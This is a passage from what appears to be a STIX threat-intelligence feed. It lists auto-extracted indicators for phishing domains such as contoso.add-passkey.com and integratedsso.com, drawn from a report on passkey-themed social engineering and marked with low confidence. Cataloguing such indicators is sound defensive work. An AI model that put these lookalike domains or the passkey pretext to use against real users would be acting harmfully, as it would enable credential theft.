'companyname.maliciousdomain.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e200e53-1fc6-4111-b27a-68dab51ad40a","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: contoso.add-passkey.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: can persuade users to proceed with authentication. Example: contoso[.]add-passkey[.]com . The me Domain examples, defanged Passkey passkeyhelpd","pattern":"[domain-name:value = 'contoso.add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aba35863-e6e1-49fb-a4f2-3ee6c8abd17b","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: integratedsso.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: trar involvement in the activity. For example, company-name.integratedsso[.]com and company-name.secure-passkey[.]com illustrate how the","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]}]}